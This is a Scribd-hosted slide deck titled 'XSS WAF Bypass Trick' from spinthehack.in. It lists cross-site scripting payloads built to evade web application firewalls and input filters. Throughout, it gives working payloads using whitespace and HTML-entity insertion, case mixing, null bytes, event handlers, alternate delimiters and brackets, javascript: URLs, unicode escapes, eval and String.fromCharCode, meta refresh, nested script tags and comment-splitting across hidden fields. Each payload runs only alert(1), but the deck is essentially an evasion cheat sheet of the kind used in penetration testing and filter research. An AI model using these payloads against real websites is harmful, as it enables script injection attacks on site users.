Scribd
Upload
43 views12 pages

WAF Bypass

Uploaded by

peter77
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
43 views12 pages

WAF Bypass

Uploaded by

peter77
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

XSS WAF Bypass Trick

www.spinthehack.in

Watch here

▪ Basic Modification

<script>alert(1)</script>

This is our normal payload but now if WAF is blocking


<script>,alert,</script> tags, then you can try this.

<script >alert(1)</script> Try giving random


whitespaces to
<script >alert(1)</script> bypass WAF.

<script&#9>alert(1)</script> Try giving random


HTML encoded
<script&#10>alert(1)</script> values between
<script&#13>alert(1)</script> Script tags.

Try lowercase or
<ScRipT>alert(1)</sCriPt> uppercase letters
in between or add
<%00script>alert(1)</script> %00 to bypass
<script>al%00ert(1)</script> alert word
restriction.
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Attributes and Tags


<input type =“text” name=“input” value=“hello”>

You can try this payload to fool the website, because as it


has <> (closing tag) and the website gets terminated as it
feels like the value is empty.

<input type="text" name="input" Try writing XSS


value="><script>alert(1)</script> test code

<randomtag type="text" Try writing any


name="input" random tag at
value="><script>alert(1)</script> starting

Trying to Change
<iNpUt type="text" name="input" Lower case and
value="><script>alert(1)</script> Upper case can
also work

Try replacing the


<input/'type="text" name="input" space or writing
value="><script>alert(1)</script> any HTML values
between tags
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Attributes and Tags


<input/type="text" name="input"
value="><script>alert(1)</script>

<input&#9type="text" name="input"
Try replacing the
value="><script>alert(1)</script> space or writing
any HTML values
<input&#10type="text" name="input" between tags
value="><script>alert(1)</script>

<input&#13type="text" name="input"
value="><script>alert(1)</script>

<%00input type="text" name="input"


Try inserting null
value="><script>alert(1)</script> byte (%00) at
different
<inp%00ut type="text" name="input" positions
value="><script>alert(1)</script>

<input t%00ype="text" name="input"


value="><script>alert(1)</script> Null Byte can
work on Attribute
name and values
<input type="text" name="input" too
value="><script>a%00lert(1)</script>
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Event Handlers

<input onsubmit=alert(1)>

A Button which a user is going to click on a page. By


working on some JavaScript we can create a button (an
event).

<object onerror=alert(1)> Try these


<body onactivate=alert(1)> alternatives
instead on
<body onfocusin=alert(1)>
onsubmit (if it
<script onreadystatechange=alert(1)> doesn’t work)
<input autofocus onfocus=alert(1)>
</a onfocus=alert(1)>

<audio src="new.mp3"
onerror=alert(1)>
These
alternatives can
<video src="new.mp4" also be used if it
onerror=alert(1)> the HTML used
here is HTML5
<svg width="200" height="100"
onload=alert(1)>
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Delimiters & Brackets


Delimiter is one or more character used to separate text

<img onerror="alert(1)"src=x> Try using Single


<img onerror='alert(1)'src=x> and Double quotes

<img
onerror=&#34alert(1)&#34src=x> Try using encoded
values to Bypass

<img
onerror=&#39alert(1)&#39src=x>

<img onerror=`alert(1)`src=x> Try using backtick


or accent

<img Can use encoded


values in between
onerror=&#96alert(1)&#96src=x>

Try using ` (grave


<img src=`x`onerror=alert(1)> accent)
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Delimiters & Brackets


Same as Delimiters, Brackets can also help to bypass
website or page filters.

By using extra
brackets the
system can be
<<script>alert(1)//<</script> tricked, and by
using double slash
it comments out
the extra bracket
on closing tag

Open Bracket at
<input onsubmit=alert(1)< the end could also
help to bypass

Try using
different
«input onsubmit=alert(1)»
brackets

Try using
&#174input different
onsubmit=alert(1)&#175 Characters
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Psuedo Protocols
<a href="https://www.google.com">Click Here</a>
It’s a hyperlink where a user goes from one page to
another with just one click

<a href="javascript:alert(1)">Click Here</a>


Try Injecting a code using Javascript to check XSS

<img src=javascript:alert(1)>

<form action=javascript:alert(1)>
Other attributes
<object data=javascript:alert(1)> also can be used
that takes URL as
a value
<button
formaction=javascript:alert(1)>

<video src=javascript:alert(1)>
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Existing Javascript & Character Escaping

<script>var a = 'myteststring; ... Try defining a


Variable & injecting
</script>
a payload

Script will function


but the system wont
'; alert(1); // filter because of
double slash.

Escaping character
<script>var a = '\\'; alert(1); // can also be helpful

Using Unicode
<script>a\u006cert(1)</script> Characters like this
can help
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Dynamic String Construction & Eval()


JavaScript contains a function called eval()

This function
eval('1 + 1') evaluate to 2

We can use Unicode


eval<script>eval('a\u006c encoding
ert(1)')</script> ('1 + 1')

if the function is
<script>eval('al' + blocked then some
actual characters
'ert(1)')</script> can work

<script>eval(String.fromCharCode(97, 108, 101,


114, 116, 40, 49, 41))</script>
There is another function that can be used in lieu of
eval() called fromCharCode().
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Meta Refresh & File Renaming

Web browser can automatically refresh the current page


after a certain period

<meta http-equiv="refresh"
content="0;url=javascript:alert(1);">

Try renaming the


<script src="payload.jpg"> source to an image file
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Sanitization & Length Limits

Try adding multiple


<script><script>alert(1)</s tags. (sometimes
application removes
cript> first instance of script
tag)

Can add any tag for


<sc<script>ript>alert(1)</s first instance to get
filtered by application
cript>

If a page is being returned because of the


Length Limit then:

<input type="hidden" name="id“


value=""><script>/*">
/* and */ get ignored,
<input type="hidden" name="checksum" so the browser
ultimately processes
value="*/alert(1)/*"> our payload as if it was
injected in only one
<input type="hidden" name="status" location
value="*/</script>"
XSS WAF Bypass Trick
www.spinthehack.in

Watch here

▪ Advance Filter Evasion Techniques

<script>alert(1)</script>

Imagine in this payload you are not allowed to use


</script> which is closing tag.

What will you do now?


Don’t worry we have solution for you, OWASP
official website have covered a list of more
different tricks to bypass WAF.

VISIT THIS LINK:


XSS Filter Evasion Cheat Sheet | OWASP

You might also like